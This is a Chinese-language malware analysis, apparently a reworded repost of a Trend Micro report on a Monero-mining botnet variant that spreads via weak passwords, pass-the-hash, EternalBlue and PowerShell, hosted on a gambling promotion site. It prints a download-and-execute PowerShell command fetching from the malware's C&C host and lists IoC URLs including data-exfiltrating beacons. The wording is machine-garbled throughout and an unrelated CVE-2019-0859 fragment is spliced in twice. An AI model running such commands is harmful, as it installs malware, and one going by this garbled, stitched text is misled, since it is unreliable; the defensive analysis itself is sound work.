影响国人的挖矿歹意软件新变种已舒展外洋 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

影响国人的挖矿歹意软件新变种已舒展外洋

申博_新闻事件 申博 174次浏览 已收录 0个评论

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

趋向科技曾在2019年终在中国的大陆、台湾和香港区域发现了一类新的门罗币挖矿歹意软件变种,此歹意软件经由过程多种流传沾染要领在体系和服务器中大肆植入加密泉币挖矿机。在我们之前观察的样本中,其沾染体式格局包孕弱暗码测试,和运用哈希通报手艺、Windows管理工具,和公然可用代码举行暴力进击。但是近期,我们在日本发现了此歹意软件的新变种,进击者在个中经由过程应用“永久之蓝”破绽和PowerShell脚正本侵入体系并回避检测。

同时,我们的遥测手艺显现,当今除台湾和香港以外,在澳大利亚、越南、印度等地也涌现了这类要挟,由此来看,进击者正将僵尸网络散布到其他国家和区域。

流传与行动

此歹意软件(由趋向科技检测为Trojan.PS1.LUDICROUZ.A)的重要流传手艺是在受沾染的机械上,依据弱暗码列表来实验登录网络中衔接的其他计算机。歹意软件并不是直接将长途敕令发送到所衔接的体系中去,而是先变动受沾染计算机的防火墙和端口转发设置,并设置一个计划义务来下载和实行更新后的歹意软件副本。下载好的副本是个PowerShell剧本,由以下敕令实行:

IEX (New-Object Net.WebClient).downloadstring(‘hxxp://v.beahh[.]com/wm?hp’)

影响国人的挖矿歹意软件新变种已舒展外洋

表1.弱暗码列表。

歹意软件应用此表和Invoke-WMIMethod(由趋向科技检测为HackTool.Win32.Impacket.AI)来长途接见其他计算机:

影响国人的挖矿歹意软件新变种已舒展外洋

图1.Invoke-WMIMethod,用于长途接见设置的是弱暗码的计算机。

歹意软件还运用哈希通报要领,经由过程用户的哈希暗码向长途服务器考证本身身份。这类要领的步调是,歹意软件起首经由过程运用Get-PassHashes敕令猎取存储在计算机中的哈希值,同时另有上面列出的弱暗码列表的哈希值;猎取哈希值后,歹意软件运用invok – smbclient(另一个公然可用的剧本)经由过程哈希通报来实行文件同享操纵。

影响国人的挖矿歹意软件新变种已舒展外洋

影响国人的挖矿歹意软件新变种已舒展外洋

图2.运用哈希通报手艺猎取用户暗码哈希值和弱暗码哈希值。

若是胜利,它将删除文件%Start Menu%\ Programs \ Startup \ run.bat,此文件多是植入的旧版本歹意软件文件,它还删除以下内容:

· %Application Data%\ flashplayer.tmp

· %Application Data%\ sign.txt  – 用于指导计算机已被沾染

· %Start Menu%\Programs\Startup\FlashPlayer.lnk – 卖力在启动时实行tmp剧本

若是用户运用的是强暗码,则歹意软件应用“永久之蓝”举行流传。

影响国人的挖矿歹意软件新变种已舒展外洋

图3.破绽应用的相干有用负载。

经由过程上述要领沾染计算机后,歹意软件将猎取MAC地点并网络有关计算机中装置的防病毒产物的信息。它从C&C服务器下载另一个殽杂的PowerShell剧本(趋向科技检测为Trojan.PS1.PCASTLE.B),并将猎取的信息发还。下载的PowerShell是一个dropper,卖力下载和实行歹意软件的组件,个中大部分是本身的副本。

影响国人的挖矿歹意软件新变种已舒展外洋

图4.猎取MAC地点和AV产物的例行顺序。

歹意软件为了搜检是不是已装置其组件,会寻觅以下文件:

· %Temp%\kkk1.log

· %Temp%\pp2.log

· %Temp%\333.log

· %Temp%\kk4.log

· %Temp%\kk5.log

影响国人的挖矿歹意软件新变种已舒展外洋

图5.搜检是不是已装置的歹意软件组件。

CVE-2019-0859:win32k.sys 0 day破绽

卡巴斯基的automatic Exploit Prevention (EP)系统又发现Windows操作系统中的一个漏洞利用。研究人员进一步分享发现是win32k.sys中的一个0 day漏洞。这是卡巴斯基近期发现的Windows系统中的第5个本地权限提升漏洞,前4个分别是: · CVE-

每一个$ flagX代表一个组件。上述的PowerShell dropper剧本就是第一个组件$ flag,歹意软件经由过程装置一个计划义务来按期运转此剧本并搜检更新。歹意软件的行动则取决于此剧本运转时的权限。第二个组件$ flag2可以或许从分歧的URL地点处下载歹意软件的副本,并建立一个分歧称号的调理义务。

影响国人的挖矿歹意软件新变种已舒展外洋

影响国人的挖矿歹意软件新变种已舒展外洋

图6.组件$ flag和$ flag2。

第三个组件(由趋向科技检测为TrojanSpy.Win32.BEAHNY.THCACAI)是一个植入的木马顺序——一份更大文件尺寸的本身副本,能够会回避沙箱检测,并从主机网络体系信息,包孕:

· 电脑称号

· 机械的GUID

· MAC地点

· 操纵体系版本

· 图象内存信息

· 体系时候

第四个组件是Python编译的二进制可实行文件,它能进一步流传歹意软件,还可以或许经由过程植入和实行Mimikatz的PowerShell完成(由趋向科技检测为Trojan.PS1.MIMIKATZ.ADW)来通报哈希进击。

影响国人的挖矿歹意软件新变种已舒展外洋

图7.植入的第四个可实行组件。

影响国人的挖矿歹意软件新变种已舒展外洋

影响国人的挖矿歹意软件新变种已舒展外洋

图8.搜检是不是已装置了Mimikatz组件,并实行Mimikatz。

歹意软件还会试图运用弱SQL暗码来接见数据库服务器,接见时运用的是xp_cmdshell来实行shell敕令。与主文件一样,该组件经由过程重用与先前破绽应用相干的大众可用代码,扫描可经由过程“永久之蓝”应用的易受进击装备的IP块。

影响国人的挖矿歹意软件新变种已舒展外洋

图9.扫描易受进击的数据库服务器。

第五个组件是一个可实行文件,可下载并实行。但是,在撰写本文时下载的URL处于脱机状况。

歹意软件的有用负载——门罗币挖矿机——也由PowerShell布置,但不是存储在文件中,而是被注入到本身的PowerShell历程中,并运用另一个公然可用的代码Invoke-ReflectivePEInjection。装置完成后,歹意软件会向C&C服务器申报其状况。

影响国人的挖矿歹意软件新变种已舒展外洋

图10.下载并实行挖矿机有用负载的PowerShell剧本。

影响国人的挖矿歹意软件新变种已舒展外洋

图11.实行挖矿机的有用负载。

结论

歹意软件的设想非常庞杂。它应用计算机体系和数据库中的弱暗码,针对公司能够仍在运用的遗留软件,运用基于PowerShell的剧本,在内存中下载和实行组件;并应用未修补的破绽,和运用Windows启动文件夹和义务调理顺序举行装置。考虑到PowerShel及开源代码的日趋提高,我们估计会在不远的未来看到更多更庞杂的歹意软件。虽然与直接盗取个人身份信息比拟,网络体系信息并发送回C&C能够看起来眇乎小哉,但体系信息关于每台机械来讲是无独有偶的,可用于跟踪,辨认和跟踪用户和运动。

影响国人的挖矿歹意软件新变种已舒展外洋

图12.歹意软件新的URL地点。

我们发起用户尽快运用来自正当供应商的可用补钉更新体系。装置旧版本软件的用户还应该运用牢靠泉源的假造补钉举行更新。我们在撰写本文时,歹意软件仍处于运动状况,并已更新URL地点。同时,发起用户最好能运用庞杂点的暗码,并尽量受权分层身份考证。对企业来讲,应启用一个多层珍爱体系,能有用阻挠此类要挟。

IoC

影响国人的挖矿歹意软件新变种已舒展外洋

URLs

hxxp://down[.]beahh[.]com/c32.dat
hxxp://down[.]beahh[.]com/new.dat?allv5
hxxp://ii[.]ackng[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://log[.]beahh[.]com/logging.php?ver=5p?src=wm&target
hxxp://oo[.]beahh[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://p[.]beahh[.]com/upgrade.php
hxxp://pp[.]abbny[.]com/t.php?ID={Computer Name}&GUID={GUID}&MAC={MAC ADDRESS}&OS={OS Version&BIT={32/64}&CARD={VIDEO CARD INFORMATION}&_T={TIME}
hxxp://v[.]beahh[.]com/wm?hp
hxxp://v[.]y6h[.]net/g?h
hxxp://v[.]y6h[.]net/g?l
lplp1[.]abbny[.]com:443
lplp1[.]ackng[.]com:443
lplp1[.]beahh[.]com:443

CVE-2019-0859:win32k.sys 0 day破绽

卡巴斯基的automatic Exploit Prevention (EP)系统又发现Windows操作系统中的一个漏洞利用。研究人员进一步分享发现是win32k.sys中的一个0 day漏洞。这是卡巴斯基近期发现的Windows系统中的第5个本地权限提升漏洞,前4个分别是: · CVE-


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明影响国人的挖矿歹意软件新变种已舒展外洋
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址